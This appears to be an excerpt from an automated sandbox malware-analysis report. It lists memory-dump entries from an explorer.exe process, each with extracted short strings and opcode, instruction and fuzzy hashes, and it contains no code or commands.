                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 981abb2164a71ad1bd305d485abde131db70aa7b0a5ec3b5380fb6584829e296
                                                • Instruction ID: b0ee39af1b72c6a30b79116a261e55f2f45c62cc7db2021b1e48229346a86750
                                                • Opcode Fuzzy Hash: 981abb2164a71ad1bd305d485abde131db70aa7b0a5ec3b5380fb6584829e296
                                                • Instruction Fuzzy Hash: F291B030A48B858FE765DB28C091669B7F2FF55340F5449BEC09AC7A96DE38F881C741
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_H$HBL
                                                • API String ID: 0-684199934
                                                • Opcode ID: 821847e0698864809a00608e2f263a62cd7b1ca38e537cb0f7f33539228bce55
                                                • Instruction ID: f318e686bbe39243fa61288f94743e9a1f9545916b96f45f0628570ef35bdfec
                                                • Opcode Fuzzy Hash: 821847e0698864809a00608e2f263a62cd7b1ca38e537cb0f7f33539228bce55
                                                • Instruction Fuzzy Hash: A141AB71C5864A9FEB44EBA4D8566FDBBB2FF45341F0401BAD009E7192DB386A44CB82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8\L${z}
                                                • API String ID: 0-139024292
                                                • Opcode ID: cf0388d67a1126725d21b54be32c92dd96c9b4d1622926ab2560006c1e3f3a85
                                                • Instruction ID: c5ec541263c89312f1e8ef214c71fc06e771157e50e3e5f49f6bc51711d373c7
                                                • Opcode Fuzzy Hash: cf0388d67a1126725d21b54be32c92dd96c9b4d1622926ab2560006c1e3f3a85
                                                • Instruction Fuzzy Hash: E931EA3294C94A9FEB54A668E8956ED77F2FFD6360F04017ED04AC7182EE68B842C750
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (3K$r6B
                                                • API String ID: 0-2051520653
                                                • Opcode ID: f090d27e50304f3386a96a76aec7c920ceed473672f8b88c9a84b922400ae7b9
                                                • Instruction ID: 81dbd97c1c3f880d84b81ea7046875d74b070f1cf5719fb6951c6bd143cb7117
                                                • Opcode Fuzzy Hash: f090d27e50304f3386a96a76aec7c920ceed473672f8b88c9a84b922400ae7b9
                                                • Instruction Fuzzy Hash: 0A31A374E5894D8FDF94EBACD899AAD7BF2FF59340F40016AD109D72A1DA38B841CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N_H$HBL
                                                • API String ID: 0-684199934
                                                • Opcode ID: 3d00509120288070f2edddaaf6901fc1d26ca6c7763404430ee1fe96a2c0fa31
                                                • Instruction ID: 45f58ee7398b7ee6c615d0d8098c78690890bb31f1ac6bc56c9d37b29beaca65
                                                • Opcode Fuzzy Hash: 3d00509120288070f2edddaaf6901fc1d26ca6c7763404430ee1fe96a2c0fa31
                                                • Instruction Fuzzy Hash: 87315870C18A4D9FEB84EBA8D8557EDB6B2FF59741F4001BAD009E3196DB386A40CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B$r6B
                                                • API String ID: 0-2860294223
                                                • Opcode ID: 2b35a7fb935f096541fcfac41488795d66e88eeca08cd5b9c3151b1ca78f1074
                                                • Instruction ID: 3879a9b42d49f8f5bbf15e8a6b24198b54915fa4540f52ab35a9b64c96aa3e25
                                                • Opcode Fuzzy Hash: 2b35a7fb935f096541fcfac41488795d66e88eeca08cd5b9c3151b1ca78f1074
                                                • Instruction Fuzzy Hash: E2218072F5C9195BAB98E55CE8915FDB3F3FB88A60B14027ED00DD3286DD2478028381
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: d60a39fe4f05401b120d26481239ad5cf7bf54e9420e2c9e97267c7e8895fb9e
                                                • Instruction ID: eed4f521468ac71dd3db0a85350c46ccb5c4a65a80a75c7a356eb9e08931dadc
                                                • Opcode Fuzzy Hash: d60a39fe4f05401b120d26481239ad5cf7bf54e9420e2c9e97267c7e8895fb9e
                                                • Instruction Fuzzy Hash: 8C217A71E5890D9FDB48DB9CD8506ECB7B2FF99340F4041BAD419E3282DE386842CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $r6B
                                                • API String ID: 0-2315467569
                                                • Opcode ID: 7de8f4fbd9c73027a13a6988d558d3eb2f6e87fa60696f47575c969d23567273
                                                • Instruction ID: c5fc8638016c5c3a71e09afa8981e76383ba6d3624b3213d18d34c5b6158173f
                                                • Opcode Fuzzy Hash: 7de8f4fbd9c73027a13a6988d558d3eb2f6e87fa60696f47575c969d23567273
                                                • Instruction Fuzzy Hash: 6E213871D9850AAEEB589A98D4946FEB7B2FF48741F00417AC40DD3186DE283842DB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 1e4377d8db67911e01eb637b55679ebb2807f3950ac22375c39787f42f8379ff
                                                • Instruction ID: 100716c98fa862a09a81e8b6fe31b07565450e0e1d3472ebfd906464735960b2
                                                • Opcode Fuzzy Hash: 1e4377d8db67911e01eb637b55679ebb2807f3950ac22375c39787f42f8379ff
                                                • Instruction Fuzzy Hash: FBA14A34D0861D9FDB49CF58C494AACB7B1FF69344F1084AED42ED7392CA39A982CB15
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: be3ae81b305745b6828741fb6104f73396c40d8a6a801b86bcd6f34051a47a5c
                                                • Instruction ID: 277f50db40026d40e0ef3ac88290a6047d74db0dbe5154e2155cc0db893cd6fb
                                                • Opcode Fuzzy Hash: be3ae81b305745b6828741fb6104f73396c40d8a6a801b86bcd6f34051a47a5c
                                                • Instruction Fuzzy Hash: A4513730A9C6994FF74D9A6CD8522BC77E1FB46399F1401BEC4ABD7183D9186883C781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: b4B
                                                • API String ID: 0-3849415641
                                                • Opcode ID: 68ff306419929ce6fc04c73f83ef8845492c18576705759d69630728d7bb3499
                                                • Instruction ID: 7da5aec4c460ecada495abfdc7d55c2f9bf52eb09f923baca7f80bafe0625b48
                                                • Opcode Fuzzy Hash: 68ff306419929ce6fc04c73f83ef8845492c18576705759d69630728d7bb3499
                                                • Instruction Fuzzy Hash: 17510531A5C6995FE70D9A68D8912BD7BE2FB46358F2401BDC49BC7283D91AB843C381
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0DL
                                                • API String ID: 0-3174716889
                                                • Opcode ID: cb7ec33d7cf2fab04889667a48948d717c24f0cdf11c11d35f0ee23eaae169f2
                                                • Instruction ID: 58be074a506b8578b5683f149144db072893f1c44ff37b9ab1bbf0095c209ed9
                                                • Opcode Fuzzy Hash: cb7ec33d7cf2fab04889667a48948d717c24f0cdf11c11d35f0ee23eaae169f2
                                                • Instruction Fuzzy Hash: 1B71C670D58A198FDB94EB68D894BACB7F2FF59340F5041AAD00DE7292DA34A9C1CF01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M_I
                                                • API String ID: 0-1631496010
                                                • Opcode ID: 527be21c56a6bc7912795941230a2e956c7f56064c5f66f457fc50dd420862eb
                                                • Instruction ID: 1eefbec50b29c7e5fdc9e9609f642554cfcb486d474a76c161528ad11e1d5092
                                                • Opcode Fuzzy Hash: 527be21c56a6bc7912795941230a2e956c7f56064c5f66f457fc50dd420862eb
                                                • Instruction Fuzzy Hash: 8851D371D4D64A8FE744ABA8E4902FDBBF2FF02350F4402BED04AA7283DE286945C745
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: 517b8caad787b70c4bd2874fca5a318590782eddd460ce10ec62bac1388fa36e
                                                • Instruction ID: 6dab85dcce982a00887fc22d13475259a380ea117df7c275e12da97817ec52ff
                                                • Opcode Fuzzy Hash: 517b8caad787b70c4bd2874fca5a318590782eddd460ce10ec62bac1388fa36e
                                                • Instruction Fuzzy Hash: 2B41FC70D48A5D9FDB94DFA8D499BADBBF1FF68301F04006AD409E7291DB74A881CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: H;H
                                                • API String ID: 0-2930457148
                                                • Opcode ID: aac8b7998fcf552e4ef311b68d799abb8a1118de4442a0e925efc792f6512783
                                                • Instruction ID: e13270e1f9a991fefd4075643ed8262169229ff2f1a6a20087b6ed38eca27be3
                                                • Opcode Fuzzy Hash: aac8b7998fcf552e4ef311b68d799abb8a1118de4442a0e925efc792f6512783
                                                • Instruction Fuzzy Hash: DD41E570D08A5D9FDF94EBA8D499BADBBF1FF68301F04006AD409E7295DB74A881CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 24954e2407bd13df6b73490990eb73d115e2a78f07a260d38a03d285746d1bd3
                                                • Instruction ID: 9393e7cc418f6f42cc8c611c01e3c5ab54285a080841d4fcea577a746d4b1cf3
                                                • Opcode Fuzzy Hash: 24954e2407bd13df6b73490990eb73d115e2a78f07a260d38a03d285746d1bd3
                                                • Instruction Fuzzy Hash: 6731C771A1891D9FDF88EB9CD895EADBBF1FF99340F00016AD10DD72A1DA38A841CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 3638509ca2c6209b88d809871fa5a2fb0475a94c43b37da602fbb9b64aa29845
                                                • Instruction ID: 16c36525524118076a620ce9d8aa1af4b263e612c583ecc210ce35be9e6b2eff
                                                • Opcode Fuzzy Hash: 3638509ca2c6209b88d809871fa5a2fb0475a94c43b37da602fbb9b64aa29845
                                                • Instruction Fuzzy Hash: 06219670E1491D8FDF84EBACC495EADBBF1FF59340B41406AD51DE7261DA38A841CB40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 371704b5d9bc6042d9d85e75bb18ba8bfc78c737fe06900c03b326b091174f5e
                                                • Instruction ID: 0b08d6e5e84ad89fae5c19baf1c602355c9b441ff0224416d49b7227daa759fb
                                                • Opcode Fuzzy Hash: 371704b5d9bc6042d9d85e75bb18ba8bfc78c737fe06900c03b326b091174f5e
                                                • Instruction Fuzzy Hash: 0D112132FAC9195B9B98E65CE8915BCB3E3FF99BA0B14427DD40ED3282DD1578028681
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 6802b8f44b7769fa817fd8c924511abae402af23fa5eb8d121462a80b7479c6c
                                                • Instruction ID: 6308bafbf94ec3e472d7d20a9edde7deaf7d7fb007364b3db71022e7e254e8a6
                                                • Opcode Fuzzy Hash: 6802b8f44b7769fa817fd8c924511abae402af23fa5eb8d121462a80b7479c6c
                                                • Instruction Fuzzy Hash: B201FE61E5CD4A9FD7D8EE68C4953B973E1FF64745B40427EC80EC71C2EE14A8058741
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: r6B
                                                • API String ID: 0-2624010786
                                                • Opcode ID: 5d1b5ae4696257a7511fa5b54f7d64a009bff735f633178dacf54bf061361684
                                                • Instruction ID: ad6b4824e84d9195764b832706cdaeb947d714f6f747746cb9b7fa53c8ca87bc
                                                • Opcode Fuzzy Hash: 5d1b5ae4696257a7511fa5b54f7d64a009bff735f633178dacf54bf061361684
                                                • Instruction Fuzzy Hash: CF01B561B58E4E9FD788EE68C4953F9B3E1FF64341B00417EC80EC3692EE24A4058741
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8eL
                                                • API String ID: 0-2915619072
                                                • Opcode ID: e9c8691b0098c2d19a567465d2901634218dbbb161e3f5b5de620ea729e01775
                                                • Instruction ID: 08ead22f693b659f01f44d7e4d00f33c4d0a8010499a8be639a944abc09e44ea
                                                • Opcode Fuzzy Hash: e9c8691b0098c2d19a567465d2901634218dbbb161e3f5b5de620ea729e01775
                                                • Instruction Fuzzy Hash: 53F0A975918A0D8FEB44EF9CE8806EEB7B5FB88314F40026AE80DD3285CB34A9158781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XE
                                                • API String ID: 0-1903603036
                                                • Opcode ID: 294256b78cdc04fac0de7e775246c3fdd69551ce4a9e372d46bf187cec8b15ff
                                                • Instruction ID: 6f4c8c892a62f70a3393868eb0d56af03ebd61fb25423aa5803de10335e8f255
                                                • Opcode Fuzzy Hash: 294256b78cdc04fac0de7e775246c3fdd69551ce4a9e372d46bf187cec8b15ff
                                                • Instruction Fuzzy Hash: 49F0A074D48A4D8EEB81EB68D48C2ECBFF1FF44340F4004B9D409E3091EA34A584CB02
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3bb6d071989d04ac3baa1be1e47cee423b0cc05346ef5cdc879742b541d0179d
                                                • Instruction ID: 7f0fe5b3390f369e80e2284b3cd1aee6ce7f31d8cc518240dc87755b6620ccc2
                                                • Opcode Fuzzy Hash: 3bb6d071989d04ac3baa1be1e47cee423b0cc05346ef5cdc879742b541d0179d
                                                • Instruction Fuzzy Hash: E3D12770D18A598FEB98DB68C8A47BCB7B2FF59740F1441BDD00DE3292DA386985CB41
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2f302a3080a080986f6c2553e565ea38a14cffb2144f63a3e10c3cb410c1ab0
                                                • Instruction ID: d1616f64264e7a6ba62a62fd4633d3a3d24872d0f11dfffa7833a121715a8938
                                                • Opcode Fuzzy Hash: e2f302a3080a080986f6c2553e565ea38a14cffb2144f63a3e10c3cb410c1ab0
                                                • Instruction Fuzzy Hash: 1DB11871D18A598FEB98DB68C8A47ACB7B2FF59344F1441BDC00DD7292DE386984CB41
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 600a1cf5d18a65d8d45f93bbea2e643047c89fa157d2c8f885560107f0e2133b
                                                • Instruction ID: 6e23ade98f1c482783ecf6a01ae7580d1c2220655d1a073eaf7296f1a99b3d67
                                                • Opcode Fuzzy Hash: 600a1cf5d18a65d8d45f93bbea2e643047c89fa157d2c8f885560107f0e2133b
                                                • Instruction Fuzzy Hash: 82A18B31948A4A8FEB99EB68D4916ED77F2FF59340F50057DE00ED7282DB39A841CB41
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8bcc8240450cceea0f4406b265b2520ca842de3293fff278da7eb206b1a81b82
                                                • Instruction ID: c67664f250e00c231554b895842454f3f2a27f7c098279d2b1194e7121762a1e
                                                • Opcode Fuzzy Hash: 8bcc8240450cceea0f4406b265b2520ca842de3293fff278da7eb206b1a81b82
                                                • Instruction Fuzzy Hash: A5A17030A58B068FE359DF28D1D45AA7BF2FF44344B60497DC48AC7696DB39B882CB41
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8979870b8972d1db3dc0906e0104b842d97e53227a3a1dbe41be24e4c1631ff
                                                • Instruction ID: 0b93c283398273cac97e0fdc4964738050b18eb65bd349b855f4ce5bc6a357fe
                                                • Opcode Fuzzy Hash: a8979870b8972d1db3dc0906e0104b842d97e53227a3a1dbe41be24e4c1631ff
                                                • Instruction Fuzzy Hash: 68911070D1865A8FDB58DFA4C494AEDBBB2FF59301F60017DD00EA7292CB39A981CB51
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d595c6d8163acbf9f18e822314f4e49940779622b6dedb98d97c6b5003a6c140
                                                • Instruction ID: de794ff5465a4269cf24f57aebea2a4ff212e7e9895f17ed93e501eb02a1efa4
                                                • Opcode Fuzzy Hash: d595c6d8163acbf9f18e822314f4e49940779622b6dedb98d97c6b5003a6c140
                                                • Instruction Fuzzy Hash: EE51D631C8C94E4BEB6596E8D8412FCBBB2BF56392F14027ED45AD70D7EA18340AC691
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2e6628a0d753c7dd107e43ed25fafcb09a159a942f3174d1ce09c142e4010f1
                                                • Instruction ID: 8ea0feb6c80492c0bf49121e73ed4d3001062e7897f1bf301f533eb8fb4856d7
                                                • Opcode Fuzzy Hash: e2e6628a0d753c7dd107e43ed25fafcb09a159a942f3174d1ce09c142e4010f1
                                                • Instruction Fuzzy Hash: FBF0AF32644A0A8BE3659A1CE4913D973A3EBC5360F550A7EC84AC7395CD3DF482C300
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction ID: 8b61993bd31de818ad231a9c2b96b3e80e5edca3e5050b357c2ce6e3f965b9d1
                                                • Opcode Fuzzy Hash: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction Fuzzy Hash: 22F0A432244A064BD315961CE4917DA73A2EBC5360F55457EC84AC7395DD3DF582C340
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abffd04298b042f71d16c7a186e2289725a5ca71d2818b75c35cd3cf79b5a11d
                                                • Instruction ID: fd3c590c8ea77bdb287347944db800436ade2cc9507125a7db579f04fd48351b
                                                • Opcode Fuzzy Hash: abffd04298b042f71d16c7a186e2289725a5ca71d2818b75c35cd3cf79b5a11d
                                                • Instruction Fuzzy Hash: 7C018FB08486488FEB44EF6CD8883A87FF0FBDA308F44456AD40CC22D5DB351599C782
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08071710ee4b3a0a99fae776bc3be7cfb41d676a9ee10936d3940716cab33e2b
                                                • Instruction ID: df34843fc9bd58fda18ef92ac0589ebb01f09b858e8c309e3e5ccf7e603fd2f0
                                                • Opcode Fuzzy Hash: 08071710ee4b3a0a99fae776bc3be7cfb41d676a9ee10936d3940716cab33e2b
                                                • Instruction Fuzzy Hash: 6FF0A931E1890D9FDF84EBA8C495AEDB7F1FF58341B404069D40EE3251DE28A841CB51
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e61ea7cd5c88c6b66c80fe33feb4637e5e676dd514a2eb1017daad7d3a8e1209
                                                • Instruction ID: 8456bddda58af97844ef98dfa5cd32032322dd9f20aa019976284b7b3f755c7c
                                                • Opcode Fuzzy Hash: e61ea7cd5c88c6b66c80fe33feb4637e5e676dd514a2eb1017daad7d3a8e1209
                                                • Instruction Fuzzy Hash: 3FF0B771E0891D8FEF94EB98D8957ECB7B2FB58341F50416AC50DE3241DE3868519B41
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2454b04b6970654b38a17d9b1e4f0a6e7e7e09fbd9ce5321a8287b022f11a5c8
                                                • Instruction ID: 99e73224ea23ba0b12b1e8ab4c00499a185c62bf5393d1cb53cc8ffefc8b1617
                                                • Opcode Fuzzy Hash: 2454b04b6970654b38a17d9b1e4f0a6e7e7e09fbd9ce5321a8287b022f11a5c8
                                                • Instruction Fuzzy Hash: 0CF03A76D5890D8EDF81EB98D8556FEBBF1FB58301F00043AE509E3180DB34A554CB81
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0dbd3f888a1b19581b38ed27c028544f94e0fe5c6a9943e86b2da5b41740d4ab
                                                • Instruction ID: 93dccb62cbdea8c69e2728225b36e4a985f3deb489e49305ad9d286e0240bec8
                                                • Opcode Fuzzy Hash: 0dbd3f888a1b19581b38ed27c028544f94e0fe5c6a9943e86b2da5b41740d4ab
                                                • Instruction Fuzzy Hash: B8F0583181890D8EDF80EB98D8497FEBBF0FB49305F00052AE109E3180DB35A1548B81
                                                Memory Dump Source
